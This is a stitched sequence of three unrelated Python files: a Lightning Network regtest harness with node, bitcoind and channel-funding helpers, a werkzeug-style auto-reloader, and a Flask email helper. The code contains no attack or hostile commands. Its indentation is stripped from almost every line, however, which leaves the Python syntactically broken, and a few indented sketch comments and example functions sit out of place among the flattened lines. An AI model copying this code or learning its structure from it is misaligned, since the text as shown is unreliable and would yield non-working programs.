# lower priority (to effective feerate=0) so they are not mined
self.rpc.prioritisetransaction(txid, None, -fee_delta)
hashes += self.generate_block(shift)
for txid in memp:
# restore priority so they are mined
self.rpc.prioritisetransaction(txid, None, fee_delta)
hashes += self.generate_block(1 + final_len - (height + shift))
self.wait_for_log(r'UpdateTip: new best=.* height={}'.format(final_len))
return hashes
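    # e.g. (sketch): simple_reorg(height=102, shift=1) invalidates the chain from height 102
    # onward, then re-mines the evicted mempool transactions starting at height 103.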
def getnewaddress(self):
return self.rpc.getnewaddress()
class ElementsD(BitcoinD):
def __init__(self, bitcoin_dir="/tmp/bitcoind-test", rpcport=None):
config = BITCOIND_CONFIG.copy()
if 'regtest' in config:
del config['regtest']
config['chain'] = 'liquid-regtest'
BitcoinD.__init__(self, bitcoin_dir, rpcport)
self.cmd_line = [
'elementsd',
'-datadir={}'.format(bitcoin_dir),
'-printtoconsole',
'-server',
'-logtimestamps',
'-nolisten',
'-nowallet',
'-validatepegin=0',
'-con_blocksubsidy=5000000000',
]
conf_file = os.path.join(bitcoin_dir, 'elements.conf')
config['rpcport'] = self.rpcport
BITCOIND_REGTEST = {'rpcport': self.rpcport}
write_config(conf_file, config, BITCOIND_REGTEST, section_name='liquid-regtest')
self.conf_file = conf_file
self.rpc = SimpleBitcoinProxy(btc_conf_file=self.conf_file)
self.prefix = 'elementsd'
def getnewaddress(self):
"""Need to get an address and then make it unconfidential
"""
addr = self.rpc.getnewaddress()
info = self.rpc.getaddressinfo(addr)
return info['unconfidential']
class LightningD(TailableProc):
def __init__(self, lightning_dir, bitcoindproxy, port=9735, random_hsm=False, node_id=0):
TailableProc.__init__(self, lightning_dir)
self.executable = 'lightningd'
self.lightning_dir = lightning_dir
self.port = port
self.cmd_prefix = []
self.disconnect_file = None
self.rpcproxy = bitcoindproxy
self.opts = LIGHTNINGD_CONFIG.copy()
opts = {
'lightning-dir': lightning_dir,
'addr': '127.0.0.1:{}'.format(port),
'allow-deprecated-apis': '{}'.format("true" if DEPRECATED_APIS
else "false"),
'network': TEST_NETWORK,
'ignore-fee-limits': 'false',
'bitcoin-rpcuser': BITCOIND_CONFIG['rpcuser'],
'bitcoin-rpcpassword': BITCOIND_CONFIG['rpcpassword'],
# Make sure we don't touch any existing config files in the user's $HOME
'bitcoin-datadir': lightning_dir,
}
for k, v in opts.items():
self.opts[k] = v
if not os.path.exists(os.path.join(lightning_dir, TEST_NETWORK)):
os.makedirs(os.path.join(lightning_dir, TEST_NETWORK))
# Last 32-bytes of final part of dir -> seed.
seed = (bytes(re.search('([^/]+)/*$', lightning_dir).group(1), encoding='utf-8') + bytes(32))[:32]
if not random_hsm:
with open(os.path.join(lightning_dir, TEST_NETWORK, 'hsm_secret'), 'wb') as f:
f.write(seed)
if DEVELOPER:
self.opts['dev-fast-gossip'] = None
self.opts['dev-bitcoind-poll'] = 1
self.prefix = 'lightningd-%d' % (node_id)
def cleanup(self):
# To force blackhole to exit, disconnect file must be truncated!
if self.disconnect_file:
with open(self.disconnect_file, "w") as f:
f.truncate()
@property
def cmd_line(self):
opts = []
for k, v in self.opts.items():
if v is None:
opts.append("--{}".format(k))
elif isinstance(v, list):
for i in v:
opts.append("--{}={}".format(k, i))
else:
opts.append("--{}={}".format(k, v))
return self.cmd_prefix + [self.executable] + opts
def start(self, stdin=None, stdout=None, stderr=None,
wait_for_initialized=True):
self.opts['bitcoin-rpcport'] = self.rpcproxy.rpcport
TailableProc.start(self, stdin, stdout, stderr)
if wait_for_initialized:
self.wait_for_log("Server started with public key")
logging.info("LightningD started")
def wait(self, timeout=10):
"""Wait for the daemon to stop for up to timeout seconds
Returns the returncode of the process, None if the process did
not return before the timeout triggers.
"""
self.proc.wait(timeout)
return self.proc.returncode
class PrettyPrintingLightningRpc(LightningRpc):
"""A version of the LightningRpc that pretty-prints calls and results.
Useful when debugging based on logs, and less painful to the
eyes. It has some overhead since we re-serialize the request and
result to json in order to pretty print it.
"""
def call(self, method, payload=None):
id = self.next_id
self.logger.debug(json.dumps({
"id": id,
"method": method,
"params": payload
}, indent=2))
res = LightningRpc.call(self, method, payload)
self.logger.debug(json.dumps({
"id": id,
"result": res
}, indent=2))
return res
class LightningNode(object):
def __init__(self, node_id, lightning_dir, bitcoind, executor, valgrind, may_fail=False,
may_reconnect=False,
allow_broken_log=False,
allow_warning=False,
allow_bad_gossip=False,
db=None, port=None, disconnect=None, random_hsm=None, options=None,
**kwargs):
self.bitcoin = bitcoind
self.executor = executor
self.may_fail = may_fail
self.may_reconnect = may_reconnect
self.allow_broken_log = allow_broken_log
self.allow_bad_gossip = allow_bad_gossip
self.allow_warning = allow_warning
self.db = db
# Assume successful exit
self.rc = 0
socket_path = os.path.join(lightning_dir, TEST_NETWORK, "lightning-rpc").format(node_id)
self.rpc = PrettyPrintingLightningRpc(socket_path, self.executor)
self.daemon = LightningD(
lightning_dir, bitcoindproxy=bitcoind.get_proxy(),
port=port, random_hsm=random_hsm, node_id=node_id
)
# If we have a disconnect string, dump it to a file for daemon.
if disconnect:
self.daemon.disconnect_file = os.path.join(lightning_dir, TEST_NETWORK, "dev_disconnect")
with open(self.daemon.disconnect_file, "w") as f:
f.write("\n".join(disconnect))
self.daemon.opts["dev-disconnect"] = "dev_disconnect"
if DEVELOPER:
self.daemon.opts["dev-fail-on-subdaemon-fail"] = None
# Don't run --version on every subdaemon if we're valgrinding and slow.
if SLOW_MACHINE and VALGRIND:
self.daemon.opts["dev-no-version-checks"] = None
if os.getenv("DEBUG_SUBD"):
self.daemon.opts["dev-debugger"] = os.getenv("DEBUG_SUBD")
if valgrind:
self.daemon.env["LIGHTNINGD_DEV_NO_BACKTRACE"] = "1"
else:
# Under valgrind, scanning can access uninitialized mem.
self.daemon.env["LIGHTNINGD_DEV_MEMLEAK"] = "1"
if not may_reconnect:
self.daemon.opts["dev-no-reconnect"] = None
if options is not None:
self.daemon.opts.update(options)
dsn = db.get_dsn()
if dsn is not None:
self.daemon.opts['wallet'] = dsn
if valgrind:
self.daemon.cmd_prefix = [
'valgrind',
'-q',
'--trace-children=yes',
'--trace-children-skip=*python*,*bitcoin-cli*,*elements-cli*',
'--error-exitcode=7',
'--log-file={}/valgrind-errors.%p'.format(self.daemon.lightning_dir)
]
# Reduce precision of errors, speeding startup and reducing memory greatly:
if SLOW_MACHINE:
self.daemon.cmd_prefix += ['--read-inline-info=no']
def connect(self, remote_node):
self.rpc.connect(remote_node.info['id'], '127.0.0.1', remote_node.daemon.port)
def is_connected(self, remote_node):
return remote_node.info['id'] in [p['id'] for p in self.rpc.listpeers()['peers']]
def openchannel(self, remote_node, capacity=FUNDAMOUNT, addrtype="p2sh-segwit", confirm=True, wait_for_announce=True, connect=True):
addr, wallettxid = self.fundwallet(10 * capacity, addrtype)
if connect and not self.is_connected(remote_node):
self.connect(remote_node)
fundingtx = self.rpc.fundchannel(remote_node.info['id'], capacity)
# Wait for the funding transaction to be in bitcoind's mempool
wait_for(lambda: fundingtx['txid'] in self.bitcoin.rpc.getrawmempool())
if confirm or wait_for_announce:
self.bitcoin.generate_block(1)
if wait_for_announce:
self.bitcoin.generate_block(5)
if confirm or wait_for_announce:
self.daemon.wait_for_log(
r'Funding tx {} depth'.format(fundingtx['txid']))
return {'address': addr, 'wallettxid': wallettxid, 'fundingtx': fundingtx}
def fundwallet(self, sats, addrtype="p2sh-segwit"):
addr = self.rpc.newaddr(addrtype)[addrtype]
txid = self.bitcoin.rpc.sendtoaddress(addr, sats / 10**8)
self.bitcoin.generate_block(1)
self.daemon.wait_for_log('Owning output .* txid {} CONFIRMED'.format(txid))
return addr, txid
def fundbalancedchannel(self, remote_node, total_capacity, announce=True):
'''
Creates a perfectly-balanced channel, as all things should be.
'''
if isinstance(total_capacity, Millisatoshi):
total_capacity = int(total_capacity.to_satoshi())
else:
total_capacity = int(total_capacity)
self.fundwallet(total_capacity + 10000)
if remote_node.config('experimental-dual-fund'):
remote_node.fundwallet(total_capacity + 10000)
# We cut the total_capacity in half, since the peer's
# expected to contribute that same amount
chan_capacity = total_capacity // 2
total_capacity = chan_capacity * 2
else:
chan_capacity = total_capacity
self.rpc.connect(remote_node.info['id'], 'localhost', remote_node.port)
# Make sure the fundchannel is confirmed.
num_tx = len(self.bitcoin.rpc.getrawmempool())
tx = self.rpc.fundchannel(remote_node.info['id'], chan_capacity, feerate='slow', minconf=0, announce=announce, push_msat=Millisatoshi(chan_capacity * 500))['tx']
wait_for(lambda: len(self.bitcoin.rpc.getrawmempool()) == num_tx + 1)
self.bitcoin.generate_block(1)
# Generate the scid.
# NOTE This assumes only the coinbase and the fundchannel is
# confirmed in the block.
outnum = get_tx_p2wsh_outnum(self.bitcoin, tx, total_capacity)
if outnum is None:
raise ValueError("no outnum found. capacity {} tx {}".format(total_capacity, tx))
return '{}x1x{}'.format(self.bitcoin.rpc.getblockcount(), outnum)
def getactivechannels(self):
return [c for c in self.rpc.listchannels()['channels'] if c['active']]
def db_query(self, query):
return self.db.query(query)
# Assumes node is stopped!
def db_manip(self, query):
db = sqlite3.connect(os.path.join(self.daemon.lightning_dir, TEST_NETWORK, "lightningd.sqlite3"))
db.row_factory = sqlite3.Row
c = db.cursor()
c.execute(query)
db.commit()
c.close()
db.close()
def is_synced_with_bitcoin(self, info=None):
if info is None:
info = self.rpc.getinfo()
return 'warning_bitcoind_sync' not in info and 'warning_lightningd_sync' not in info
def start(self, wait_for_bitcoind_sync=True, stderr=None):
self.daemon.start(stderr=stderr)
# Cache `getinfo`, we'll be using it a lot
self.info = self.rpc.getinfo()
# This shortcut is sufficient for our simple tests.
self.port = self.info['binding'][0]['port']
if wait_for_bitcoind_sync and not self.is_synced_with_bitcoin(self.info):
wait_for(lambda: self.is_synced_with_bitcoin())
def stop(self, timeout=10):
""" Attempt to do a clean shutdown, but kill if it hangs
"""
# Tell the daemon to stop
try:
# May fail if the process already died
self.rpc.stop()
except Exception:
pass
self.rc = self.daemon.wait(timeout)
# If it did not stop be more insistent
if self.rc is None:
self.rc = self.daemon.stop()
self.daemon.save_log()
self.daemon.cleanup()
if self.rc != 0 and not self.may_fail:
raise ValueError("Node did not exit cleanly, rc={}".format(self.rc))
else:
return self.rc
def restart(self, timeout=10, clean=True):
"""Stop and restart the lightning node.
Keyword arguments:
timeout: number of seconds to wait for a shutdown
clean: whether to issue a `stop` RPC command before killing
"""
if clean:
self.stop(timeout)
else:
self.daemon.stop()
self.start()
def fund_channel(self, l2, amount, wait_for_active=True, announce_channel=True):
warnings.warn("LightningNode.fund_channel is deprecated in favor of "
"LightningNode.fundchannel", category=DeprecationWarning)
return self.fundchannel(l2, amount, wait_for_active, announce_channel)
def fundchannel(self, l2, amount=FUNDAMOUNT, wait_for_active=True,
announce_channel=True, **kwargs):
# Give yourself some funds to work with
addr = self.rpc.newaddr()['bech32']
def has_funds_on_addr(addr):
"""Check if the given address has funds in the internal wallet.
"""
outs = self.rpc.listfunds()['outputs']
addrs = [o['address'] for o in outs]
return addr in addrs
# We should not have funds on that address yet, we just generated it.
assert(not has_funds_on_addr(addr))
self.bitcoin.rpc.sendtoaddress(addr, (amount + 1000000) / 10**8)
self.bitcoin.generate_block(1)
# Now we should.
wait_for(lambda: has_funds_on_addr(addr))
# Now go ahead and open a channel
res = self.rpc.fundchannel(l2.info['id'], amount,
announce=announce_channel,
**kwargs)
wait_for(lambda: res['txid'] in self.bitcoin.rpc.getrawmempool())
self.bitcoin.generate_block(1)
# Hacky way to find our output.
scid = "{}x1x{}".format(self.bitcoin.rpc.getblockcount(),
get_tx_p2wsh_outnum(self.bitcoin, res['tx'], amount))
if wait_for_active:
self.wait_channel_active(scid)
l2.wait_channel_active(scid)
return scid, res
def subd_pid(self, subd, peerid=None):
"""Get the process id of the given subdaemon, eg channeld or gossipd"""
if peerid:
ex = re.compile(r'{}-.*{}.*: pid ([0-9]*),'
.format(peerid, subd))
else:
ex = re.compile('{}-.*: pid ([0-9]*),'.format(subd))
# Make sure we get latest one if it's restarted!
for l in reversed(self.daemon.logs):
group = ex.search(l)
if group:
return group.group(1)
raise ValueError("No daemon {} found".format(subd))
def channel_state(self, other):
"""Return the state of the channel to the other node.
Returns None if there is no such peer, or a channel hasn't been funded
yet.
"""
peers = self.rpc.listpeers(other.info['id'])['peers']
if not peers or 'channels' not in peers[0]:
return None
channel = peers[0]['channels'][0]
return channel['state']
def get_channel_scid(self, other):
"""Get the short_channel_id for the channel to the other node.
"""
peers = self.rpc.listpeers(other.info['id'])['peers']
if not peers or 'channels' not in peers[0]:
return None
channel = peers[0]['channels'][0]
return channel['short_channel_id']
def get_channel_id(self, other):
"""Get the channel_id for the channel to the other node.
"""
peers = self.rpc.listpeers(other.info['id'])['peers']
if not peers or 'channels' not in peers[0]:
return None
channel = peers[0]['channels'][0]
return channel['channel_id']
def is_channel_active(self, chanid):
channels = self.rpc.listchannels(chanid)['channels']
active = [(c['short_channel_id'], c['channel_flags']) for c in channels if c['active']]
return (chanid, 0) in active and (chanid, 1) in active
def wait_for_channel_onchain(self, peerid):
txid = only_one(only_one(self.rpc.listpeers(peerid)['peers'])['channels'])['scratch_txid']
wait_for(lambda: txid in self.bitcoin.rpc.getrawmempool())
def wait_channel_active(self, chanid):
wait_for(lambda: self.is_channel_active(chanid))
# This waits until gossipd sees channel_update in both directions
# (or for local channels, at least a local announcement)
def wait_for_channel_updates(self, scids):
# Could happen in any order...
self.daemon.wait_for_logs(['Received channel_update for channel {}/0'.format(c)
for c in scids]
+ ['Received channel_update for channel {}/1'.format(c)
for c in scids])
def wait_for_route(self, destination, timeout=30):
""" Wait for a route to the destination to become available.
"""
start_time = time.time()
while time.time() < start_time + timeout:
try:
self.rpc.getroute(destination.info['id'], 1, 1)
return True
except Exception:
time.sleep(1)
if time.time() >= start_time + timeout:
raise ValueError("Error waiting for a route to destination {}".format(destination))
# This helper waits for all HTLCs to settle
# `scids` can be a list of strings. If unset wait on all channels.
def wait_for_htlcs(self, scids=None):
peers = self.rpc.listpeers()['peers']
for p, peer in enumerate(peers):
if 'channels' in peer:
for c, channel in enumerate(peer['channels']):
if scids is not None and channel['short_channel_id'] not in scids:
continue
if 'htlcs' in channel:
wait_for(lambda: len(self.rpc.listpeers()['peers'][p]['channels'][c]['htlcs']) == 0)
# This sends money to a directly connected peer
def pay(self, dst, amt, label=None):
if not label:
label = ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(20))
# check we are connected
dst_id = dst.info['id']
assert len(self.rpc.listpeers(dst_id).get('peers')) == 1
# make an invoice
rhash = dst.rpc.invoice(amt, label, label)['payment_hash']
invoices = dst.rpc.listinvoices(label)['invoices']
assert len(invoices) == 1 and invoices[0]['status'] == 'unpaid'
routestep = {
'msatoshi': amt,
'id': dst_id,
'delay': 5,
'channel': '1x1x1' # note: can be bogus for 1-hop direct payments
}
# sendpay is async now
self.rpc.sendpay([routestep], rhash)
# wait for sendpay to comply
result = self.rpc.waitsendpay(rhash)
assert(result.get('status') == 'complete')
# This helper sends all money to a peer until even 1 msat can't get through.
def drain(self, peer):
total = 0
msat = 4294967295 # Max payment size in some configs
while msat != 0:
try:
logging.debug("Drain step with size={}".format(msat))
self.pay(peer, msat)
total += msat
except RpcError as e:
logging.debug("Got an exception while draining channel: {}".format(e))
msat //= 2
logging.debug("Draining complete after sending a total of {}msats".format(total))
return total
# Note: this feeds through the smoother in update_feerate, so changing
# it on a running daemon may not give expected result!
def set_feerates(self, feerates, wait_for_effect=True):
# (bitcoind returns bitcoin per kb, so these are * 4)
def mock_estimatesmartfee(r):
params = r['params']
if params == [2, 'CONSERVATIVE']:
feerate = feerates[0] * 4
elif params == [3, 'CONSERVATIVE']:
feerate = feerates[1] * 4
elif params == [4, 'ECONOMICAL']:
feerate = feerates[2] * 4
elif params == [100, 'ECONOMICAL']:
feerate = feerates[3] * 4
else:
warnings.warn("Don't have a feerate set for {}/{}.".format(
params[0], params[1],
))
feerate = 42
return {
'id': r['id'],
'error': None,
'result': {
'feerate': Decimal(feerate) / 10**8
},
}
self.daemon.rpcproxy.mock_rpc('estimatesmartfee', mock_estimatesmartfee)
# Technically, this waits until it's called, not until it's processed.
# We wait until all three levels have been called.
if wait_for_effect:
wait_for(lambda:
self.daemon.rpcproxy.mock_counts['estimatesmartfee'] >= 4)
# force new feerates by restarting and thus skipping slow smoothed process
# Note: testnode must be created with: opts={'may_reconnect': True}
def force_feerates(self, rate):
assert(self.may_reconnect)
self.set_feerates([rate] * 4, False)
self.restart()
self.daemon.wait_for_log('peer_out WIRE_UPDATE_FEE')
assert(self.rpc.feerates('perkw')['perkw']['opening'] == rate)
def wait_for_onchaind_broadcast(self, name, resolve=None):
"""Wait for onchaind to drop tx name to resolve (if any)"""
if resolve:
r = self.daemon.wait_for_log('Broadcasting {} .* to resolve {}'
.format(name, resolve))
else:
r = self.daemon.wait_for_log('Broadcasting {} .* to resolve '
.format(name))
rawtx = re.search(r'.* \(([0-9a-fA-F]*)\) ', r).group(1)
txid = self.bitcoin.rpc.decoderawtransaction(rawtx, True)['txid']
wait_for(lambda: txid in self.bitcoin.rpc.getrawmempool())
def query_gossip(self, querytype, *args, filters=[]):
"""Generate a gossip query, feed it into this node and get responses
in hex"""
query = subprocess.run(['devtools/mkquery',
querytype] + [str(a) for a in args],
check=True,
timeout=TIMEOUT,
stdout=subprocess.PIPE).stdout.strip()
out = subprocess.run(['devtools/gossipwith',
'--timeout-after={}'.format(int(math.sqrt(TIMEOUT) + 1)),
'{}@localhost:{}'.format(self.info['id'],
self.port),
query],
check=True,
timeout=TIMEOUT, stdout=subprocess.PIPE).stdout
def passes_filters(hmsg, filters):
for f in filters:
if hmsg.startswith(f):
return False
return True
msgs = []
while len(out):
length = struct.unpack('>H', out[0:2])[0]
hmsg = out[2:2 + length].hex()
if passes_filters(hmsg, filters):
msgs.append(out[2:2 + length].hex())
out = out[2 + length:]
return msgs
def config(self, config_name):
try:
opt = self.rpc.listconfigs(config_name)
return opt[config_name]
except RpcError:
return None
@contextmanager
def flock(directory: Path):
"""A fair filelock, based on atomic fs operations.
"""
if not isinstance(directory, Path):
directory = Path(directory)
d = directory / Path(".locks")
os.makedirs(str(d), exist_ok=True)
fname = None
while True:
# Try until we find a filename that doesn't exist yet.
try:
fname = d / Path("lock-{}".format(time.time()))
fd = os.open(str(fname), flags=os.O_CREAT | os.O_EXCL)
os.close(fd)
break
except FileExistsError:
time.sleep(0.1)
# So now we have a position in the lock, let's check if we are the
# next one to go:
while True:
files = sorted([f.resolve() for f in d.iterdir() if f.is_file()])
# We're queued, so it should at least have us.
assert len(files) >= 1
if files[0] == fname:
break
time.sleep(0.1)
# We can continue
yield fname
# Remove our file, so the next one can go ahead.
fname.unlink()
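# A minimal usage sketch (the directory path below is only an assumption):
# serializing a critical section across concurrent test processes with the
# fair file lock defined above.
def _example_flock_usage():
    with flock("/tmp/test-locks"):
        # Only one process at a time runs this block; whoever created the
        # oldest lock file in the .locks directory goes first (FIFO fairness).
        pass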
class Throttler(object):
"""Throttles the creation of system-processes to avoid overload.
There is no reason to overload the system with too many processes
being spawned or run at the same time. It causes timeouts by
aggressively preempting processes and swapping if the memory limit is
reached. In order to reduce this loss of performance we provide a
`wait()` method which will serialize the creation of processes, but
also delay if the system load is too high.
Notice that technically we are throttling too late, i.e., we react
to an overload, but chances are pretty good that some other
already running process is about to terminate, and so the overload
is short-lived. We throttle when the process object is first
created, not when restarted, in order to avoid delaying running
tests, which could cause more timeouts.
"""
def __init__(self, directory: str, target: float = 90):
"""If specified we try to stick to a load of target (in percent).
"""
self.target = target
self.current_load = self.target # Start slow
psutil.cpu_percent() # Prime the internal load metric
self.directory = directory
def wait(self):
start_time = time.time()
with flock(self.directory):
# We just got the lock, assume someone else just released it
self.current_load = 100
while self.load() >= self.target:
time.sleep(1)
self.current_load = 100 # Back off slightly to avoid triggering right away
print("Throttler delayed startup for {} seconds".format(time.time() - start_time))
def load(self):
"""An exponential moving average of the load
"""
decay = 0.5
load = psutil.cpu_percent()
self.current_load = decay * load + (1 - decay) * self.current_load
return self.current_load
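# A minimal usage sketch (the directory below is an assumption): delay the
# startup of an expensive subprocess until the CPU load estimate drops below
# the configured target.
def _example_throttler_usage():
    throttler = Throttler("/tmp/throttle", target=90)
    throttler.wait()  # blocks while the machine looks overloaded
    # ...spawn the expensive process here...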
class NodeFactory(object):
"""A factory to setup and start `lightningd` daemons.
"""
def __init__(self, request, testname, bitcoind, executor, directory,
db_provider, node_cls, throttler):
if request.node.get_closest_marker("slow_test") and SLOW_MACHINE:
self.valgrind = False
else:
self.valgrind = VALGRIND
self.testname = testname
self.next_id = 1
self.nodes = []
self.executor = executor
self.bitcoind = bitcoind
self.directory = directory
self.lock = threading.Lock()
self.db_provider = db_provider
self.node_cls = node_cls
self.throttler = throttler
def split_options(self, opts):
"""Split node options from cli options
Some options are used to instrument the node wrapper and some are passed
to the daemon on the command line. Split them so we know where to use
them.
"""
node_opt_keys = [
'disconnect',
'may_fail',
'allow_broken_log',
'allow_warning',
'may_reconnect',
'random_hsm',
'feerates',
'wait_for_bitcoind_sync',
'allow_bad_gossip'
]
node_opts = {k: v for k, v in opts.items() if k in node_opt_keys}
cli_opts = {k: v for k, v in opts.items() if k not in node_opt_keys}
return node_opts, cli_opts
def get_next_port(self):
with self.lock:
return reserve()
def get_node_id(self):
"""Generate a unique numeric ID for a lightning node
"""
with self.lock:
node_id = self.next_id
self.next_id += 1
return node_id
def get_nodes(self, num_nodes, opts=None):
"""Start a number of nodes in parallel, each with its own options
"""
if opts is None:
# No opts were passed in, give some dummy opts
opts = [{} for _ in range(num_nodes)]
elif isinstance(opts, dict):
# A single dict was passed in, so we use these opts for all nodes
opts = [opts] * num_nodes
assert len(opts) == num_nodes
jobs = []
for i in range(num_nodes):
node_opts, cli_opts = self.split_options(opts[i])
jobs.append(self.executor.submit(
self.get_node, options=cli_opts,
node_id=self.get_node_id(), **node_opts
))
return [j.result() for j in jobs]
def get_node(self, node_id=None, options=None, dbfile=None,
feerates=(15000, 11000, 7500, 3750), start=True,
wait_for_bitcoind_sync=True, may_fail=False,
expect_fail=False, cleandir=True, **kwargs):
self.throttler.wait()
node_id = self.get_node_id() if not node_id else node_id
port = self.get_next_port()
lightning_dir = os.path.join(
self.directory, "lightning-{}/".format(node_id))
if cleandir and os.path.exists(lightning_dir):
shutil.rmtree(lightning_dir)
# Get the DB backend DSN we should be using for this test and this
# node.
db = self.db_provider.get_db(os.path.join(lightning_dir, TEST_NETWORK), self.testname, node_id)
node = self.node_cls(
node_id, lightning_dir, self.bitcoind, self.executor, self.valgrind, db=db,
port=port, options=options, may_fail=may_fail or expect_fail,
**kwargs
)
# Regtest estimatefee are unusable, so override.
node.set_feerates(feerates, False)
self.nodes.append(node)
if dbfile:
out = open(os.path.join(node.daemon.lightning_dir, TEST_NETWORK,
'lightningd.sqlite3'), 'xb')
with lzma.open(os.path.join('tests/data', dbfile), 'rb') as f:
out.write(f.read())
if start:
try:
# Capture stderr if we're failing
if expect_fail:
stderr = subprocess.PIPE
else:
stderr = None
node.start(wait_for_bitcoind_sync, stderr=stderr)
except Exception:
if expect_fail:
return node
node.daemon.stop()
raise
return node
def join_nodes(self, nodes, fundchannel=True, fundamount=FUNDAMOUNT, wait_for_announce=False, announce_channels=True) -> None:
"""Given nodes, connect them in a line, optionally funding a channel"""
assert not (wait_for_announce and not announce_channels), "You've asked to wait for an announcement that's not coming. (wait_for_announce=True,announce_channels=False)"
connections = [(nodes[i], nodes[i + 1]) for i in range(len(nodes) - 1)]
for src, dst in connections:
src.rpc.connect(dst.info['id'], 'localhost', dst.port)
# If we're returning now, make sure dst all show connections in
# getpeers.
if not fundchannel:
for src, dst in connections:
dst.daemon.wait_for_log(r'{}-.*-chan#[0-9]*: Handed peer, entering loop'.format(src.info['id']))
return
bitcoind = nodes[0].bitcoin
# If we got here, we want to fund channels
for src, dst in connections:
addr = src.rpc.newaddr()['bech32']
bitcoind.rpc.sendtoaddress(addr, (fundamount + 1000000) / 10**8)
bitcoind.generate_block(1)
sync_blockheight(bitcoind, nodes)
txids = []
for src, dst in connections:
txids.append(src.rpc.fundchannel(dst.info['id'], fundamount, announce=announce_channels)['txid'])
wait_for(lambda: set(txids).issubset(set(bitcoind.rpc.getrawmempool())))
# Confirm all channels and wait for them to become usable
bitcoind.generate_block(1)
scids = []
for src, dst in connections:
wait_for(lambda: src.channel_state(dst) == 'CHANNELD_NORMAL')
scid = src.get_channel_scid(dst)
scids.append(scid)
# Wait for all channels to be active (locally)
for i, n in enumerate(scids):
nodes[i].wait_channel_active(scids[i])
nodes[i + 1].wait_channel_active(scids[i])
if not wait_for_announce:
return
bitcoind.generate_block(5)
# Make sure everyone sees all channels: we can cheat and
# simply check the ends (since it's a line).
nodes[0].wait_channel_active(scids[-1])
nodes[-1].wait_channel_active(scids[0])
# Make sure we have all node announcements, too (just check ends)
for n in nodes:
for end in (nodes[0], nodes[-1]):
wait_for(lambda: 'alias' in only_one(end.rpc.listnodes(n.info['id'])['nodes']))
def line_graph(self, num_nodes, fundchannel=True, fundamount=FUNDAMOUNT, wait_for_announce=False, opts=None, announce_channels=True):
""" Create nodes, connect them and optionally fund channels.
"""
nodes = self.get_nodes(num_nodes, opts=opts)
self.join_nodes(nodes, fundchannel, fundamount, wait_for_announce, announce_channels)
return nodes
def killall(self, expected_successes):
"""Returns true if every node we expected to succeed actually succeeded"""
unexpected_fail = False
err_msgs = []
for i in range(len(self.nodes)):
leaks = None
# leak detection upsets VALGRIND by reading uninitialized mem.
# If it's dead, we'll catch it below.
if not self.valgrind and DEVELOPER:
try:
# This also puts leaks in log.
leaks = self.nodes[i].rpc.dev_memleak()['leaks']
except Exception:
pass
try:
self.nodes[i].stop()
except Exception:
if expected_successes[i]:
unexpected_fail = True
if leaks is not None and len(leaks) != 0:
unexpected_fail = True
err_msgs.append("Node {} has memory leaks: {}".format(
self.nodes[i].daemon.lightning_dir,
json.dumps(leaks, sort_keys=True, indent=4)
))
return not unexpected_fail, err_msgs
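# A minimal usage sketch (assumed test code, mirroring the docstrings above):
# ask the factory for a funded line of nodes and pay a directly connected peer.
# `node_factory` stands in for the pytest fixture that wraps NodeFactory.
def _example_line_graph(node_factory):
    l1, l2, l3 = node_factory.line_graph(3, wait_for_announce=True)
    assert l1.channel_state(l2) == 'CHANNELD_NORMAL'
    l1.pay(l2, 100000)  # `pay` only works for directly connected peers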
|
reloader.py
|
""" The reloader that autodetects file changes for debugging
Since we ditched the old werkzeug server, this is the code that allowed it to
refresh automatically. (Ripped from https://github.com/mitsuhiko/werkzeug/blob/1a21e27a99331d854cec9174a1fc0fcd9717a673/werkzeug/_reloader.py)
"""
import sys
import os
import subprocess
import time
from itertools import chain
import threading
def _iter_module_files():
"""This iterates over all relevant Python files. It goes through all
loaded files from modules, all files in folders of already loaded modules
as well as all files reachable through a package.
"""
# The list call is necessary on Python 3 in case the module
# dictionary modifies during iteration.
for module in list(sys.modules.values()):
if module is None:
continue
filename = getattr(module, '__file__', None)
if filename:
old = None
while not os.path.isfile(filename):
old = filename
filename = os.path.dirname(filename)
if filename == old:
break
else:
if filename[-4:] in ('.pyc', '.pyo'):
filename = filename[:-1]
yield filename
class ReloaderLoop(object):
name = None
# monkeypatched by testsuite. wrapping with `staticmethod` is required in
# case time.sleep has been replaced by a non-c function (e.g. by
# `eventlet.monkey_patch`) before we get here
_sleep = staticmethod(time.sleep)
def __init__(self, extra_files=None, interval=1):
self.extra_files = set(os.path.abspath(x)
for x in extra_files or ())
self.interval = interval
def run(self):
pass
def restart_with_reloader(self):
"""Spawn a new Python interpreter with the same arguments as this one,
but running the reloader thread.
"""
while 1:
print(' * Restarting with %s' % self.name)
args = [sys.executable] + sys.argv
new_environ = os.environ.copy()
new_environ['WERKZEUG_RUN_MAIN'] = 'true'
exit_code = subprocess.call(args, env=new_environ,
close_fds=False)
if exit_code != 3:
return exit_code
def trigger_reload(self, filename):
self.log_reload(filename)
sys.exit(3)
def log_reload(self, filename):
filename = os.path.abspath(filename)
print(' * Detected change in %r, reloading' % filename)
class StatReloaderLoop(ReloaderLoop):
name = 'stat'
def run(self):
mtimes = {}
while 1:
for filename in chain(_iter_module_files(),
self.extra_files):
try:
mtime = os.stat(filename).st_mtime
except OSError:
continue
old_time = mtimes.get(filename)
if old_time is None:
mtimes[filename] = mtime
continue
elif mtime > old_time:
self.trigger_reload(filename)
self._sleep(self.interval)
def run_with_reloader(main_func, extra_files=None, interval=1,
reloader_type='auto'):
"""Run the given function in an independent python interpreter."""
import signal
reloader = StatReloaderLoop(extra_files, interval)
signal.signal(signal.SIGTERM, lambda *args: sys.exit(0))
new_environ = os.environ.copy()
new_environ['WERKZEUG_RUN_MAIN'] = 'true'
try:
if os.environ.get('WERKZEUG_RUN_MAIN') == 'true':
t = threading.Thread(target=main_func, args=())
t.setDaemon(True)
t.start()
reloader.run()
else:
sys.exit(reloader.restart_with_reloader())
except KeyboardInterrupt:
pass
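# A minimal usage sketch (not from werkzeug; `serve_forever` and the extra
# file name are placeholders): run a long-lived function under the stat
# reloader so that edits to any loaded module restart the process.
def _example_run_with_reloader():
    def serve_forever():
        while True:
            time.sleep(1)
    run_with_reloader(serve_forever, extra_files=['config.ini'], interval=1)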
|
email.py
|
from threading import Thread
from flask import current_app, render_template
from flask_mail import Message
from . import mail
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(to, subject, template, **kwargs):
app = current_app._get_current_object()
msg = Message(app.config['WREC_MAIL_SUBJECT_PREFIX'] + ' ' + subject,
sender=app.config['WREC_MAIL_SENDER'], recipients=[to])
msg.body = render_template(template + '.txt', **kwargs)
msg.html = render_template(template + '.html', **kwargs)
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
